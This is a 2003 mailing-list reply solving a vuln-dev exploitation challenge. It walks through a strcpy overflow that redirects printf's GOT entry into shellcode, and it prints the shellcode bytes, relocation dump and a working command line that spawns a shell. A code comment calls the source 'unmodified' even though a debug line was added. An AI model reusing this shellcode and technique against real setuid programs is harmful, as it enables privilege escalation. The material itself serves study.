Re: [Vuln-dev Challenge] Challenge #2

From: Jason_Royes (jroyes@da-experts.com)
Date: Fri May 23 2003 - 22:05:54 PDT


    Strategy was to overwrite the GOT entry for printf (0x08049860 in the objdump output below) with the address of the shellcode, so that the program's final printf("%s\n", bfp) call jumps into it.
    
    1) Overwrite the heap pointer held in bfp via the unbounded strcpy(buf, argv[1]): buf is a 90-byte stack array, while argv[1] is 96 bytes long (55 filler bytes + 37 bytes of shellcode + a 4-byte address), so the copy runs past buf and replaces bfp.
    
    before:
    [buf][bfp][ret]
    after:
    [buf][&printf_GOT - 2][ret]      (i.e. bfp = 0x08049860 - 2 = 0x0804985e)
    
    Subtract 2 from the printf GOT address to compensate for the two leading ";" bytes that fprintf(f1, ";;%s;;", argv[2]) writes before argv[2]: when fgets later copies that log line into the corrupted bfp, the ";;" lands in the two bytes just below the slot (the top half of the preceding __libc_start_main entry, which is never called again) and the 4 address bytes of argv[2] land exactly on the printf entry. The trailing ";;" and the NUL that fgets appends spill into the following entry (fclose), which is harmless here because the program never gets past printf.
    
    2) Overwrite the printf GOT entry with argv[2]: fgets(bfp, BFSIZE, f1) reads the log line back into wherever bfp now points. argv[2] is the address of buf (0xbffffa6c, printed by the debug line), where the 55 "A" bytes (0x41 = inc %ecx on x86) act as a slide into the shellcode that follows them; the address must contain no NUL or newline bytes or the %s / fgets path will truncate it. Note that db.log is opened in append mode and fgets reads only the first line, so this relies on the log being empty (or on the injected line being its first line) when the program runs.
    
    3) The final printf("%s\n", bfp) is then dispatched through the overwritten GOT entry and lands in the shellcode, which gives a shell (the shellcode's first int 0x80 appears to be a setreuid(0,0) call, which only matters if vd2 is installed setuid).
    
    Note that a BFSIZE of 90 actually occupies 92 bytes on the stack, since the compiler pads buf up to 4-byte alignment -- which is why 55 + 37 = 92 bytes of filler are needed before the 4 bytes that land on bfp.
    
    /* vulndev2.c */
    
    #include <stdio.h>
    #include <stdlib.h>
    
    #define BFSIZE 90
    
    /*
     * Challenge target, reproduced unmodified: the exploit writeup depends on
     * this exact declaration order, buffer size and call sequence.
     *
     * Appends argv[2] to db.log, copies argv[1] into a fixed stack buffer,
     * reads the first line of db.log back into a heap buffer and prints it.
     * Returns 1 on any argument/allocation/file error and always exits with
     * status 1 at the end; bfp is never freed.
     */
    int
    main(int argc, char *argv[])
    {
            char    *bfp;           /* heap pointer; per the debug output it sits 92 bytes past buf on the stack */
            char    buf[BFSIZE];    /* 90 bytes declared, padded to 92 by the compiler */
            FILE    *f1;

            if (argc != 3)
                    return 1;
            if ( (bfp = malloc(BFSIZE)) == NULL)
                    return 1;
    	/* debug: added by the solver (not in the original challenge listing);
    	 * leaks the two addresses the exploit needs to choose argv[2] */
    	printf("bfp = %p, buf = %p\n", bfp, buf);

            /* log input: argv[2] is written to the log unchecked and read back below */
            if ( (f1 = fopen("db.log", "a+")) == NULL)
                    return 1;
            fprintf(f1, ";;%s;;", argv[2]);
            fclose(f1);

            /* VULN: unbounded copy of argv[1] into the 90-byte buf; an overlong
             * argv[1] overwrites bfp (and beyond) */
            strcpy(buf, argv[1]);

            /* read log: fgets writes up to BFSIZE-1 bytes plus a NUL to wherever
             * bfp now points -- after the overflow above that is attacker-chosen */
            if ( (f1 = fopen("db.log", "r")) == NULL)
                    return 1;
            if (fgets(bfp, BFSIZE, f1) == NULL)
                    return 1;       /* f1 is leaked on this early return */

            /* the GOT entry this call goes through is what the exploit overwrites */
            printf("%s\n", bfp);
            fclose(f1);
            exit(1);                /* status 1 even on the success path */
    }
    ##
    jroyes@tadpole:~/study/vuln-dev/cha2$ objdump -R vd2
    
    vd2:     file format elf32-i386
    
    DYNAMIC RELOCATION RECORDS
    OFFSET   TYPE              VALUE 
    08049874 R_386_GLOB_DAT    __gmon_start__
    08049848 R_386_JUMP_SLOT   __register_frame_info
    0804984c R_386_JUMP_SLOT   fprintf
    08049850 R_386_JUMP_SLOT   malloc
    08049854 R_386_JUMP_SLOT   __deregister_frame_info
    08049858 R_386_JUMP_SLOT   fgets
    0804985c R_386_JUMP_SLOT   __libc_start_main
    08049860 R_386_JUMP_SLOT   printf
    08049864 R_386_JUMP_SLOT   fclose
    08049868 R_386_JUMP_SLOT   exit
    0804986c R_386_JUMP_SLOT   fopen
    08049870 R_386_JUMP_SLOT   strcpy
    
    
    jroyes@tadpole:~/study/vuln-dev/cha2$ hexdump -C tiny.shell
    00000000  31 db 31 c9 b0 46 cd 80  31 c0 50 68 2f 73 68 ff  |1.1..F..1.Ph/sh.|
    00000010  88 44 24 03 68 2f 62 69  6e 89 e3 50 53 89 e1 31  |.D$.h/bin..PS..1|
    00000020  d2 b0 0b cd 80                                    |.....|
    00000025
    jroyes@tadpole:~/study/vuln-dev/cha2$ ./vd2 `perl -e 'print "A"x55'``cat tiny.shell``printf "\x5e\x98\x04\x08"` `printf "\x6c\xfa\xff\xbf"`
    bfp = 0x8049898, buf = 0xbffffa6c
    sh-2.05a$ exit
    jroyes@tadpole:~/study/vuln-dev/cha2$ 
    ##
    Thanks to sin for the tiny shellcode.
    
    On Fri, 2003-05-23 at 18:13, Dave McKinney wrote:
    > 
    > We are announcing the second challenge.  Initially, we wanted to have this
    > out a few days ago but were involved in testing it on multiple platforms.
    > This challenge is a little easier than the first one, since we'd like to
    > see more people attempting to produce a proof-of-concept.  If you find it
    > too easy, you're welcome to attempt it in an environment with a
    > non-executable stack/heap to raise the bar a little.
    > 
    > Here's a link to the basic guidelines (for those who missed it):
    > 
    > http://www.securityfocus.com/archive/82/321615/2003-05-13/2003-05-19/0
    > 
    > (also, please retain the [Vuln-dev Challenge] string in the subject line
    > for replies to make for easier filtering for those not interested in
    > challenge related discussion.)
    > 
    > ---
    > 
    > /* vulndev2.c */
    > 
    > #include <stdio.h>
    > #include <stdlib.h>
    > 
    > #define BFSIZE 90
    > 
    > int
    > main(int argc, char *argv[])
    > {
    >         char    *bfp;
    >         char    buf[BFSIZE];
    >         FILE    *f1;
    > 
    >         if (argc != 3)
    >                 return 1;
    >         if ( (bfp = malloc(BFSIZE)) == NULL)
    >                 return 1;
    > 
    >         /* log input */
    >         if ( (f1 = fopen("db.log", "a+")) == NULL)
    >                 return 1;
    >         fprintf(f1, ";;%s;;", argv[2]);
    >         fclose(f1);
    > 
    >         strcpy(buf, argv[1]);
    > 
    >         /* read log */
    >         if ( (f1 = fopen("db.log", "r")) == NULL)
    >                 return 1;
    >         if (fgets(bfp, BFSIZE, f1) == NULL)
    >                 return 1;
    > 
    >         printf("%s\n", bfp);
    >         fclose(f1);
    >         exit(1);
    > }
    > 
    > ---
    > 
    > Dave McKinney
    > Symantec
    > 
    > keyID: BF919DD7
    > key fingerprint = 494D 6B7D 4611 7A7A 5DBB  3B29 4D89 3A70 BF91 9DD7
    -- 
    Jason Royes
    Data Access Experts
    http://www.da-experts.com/
    


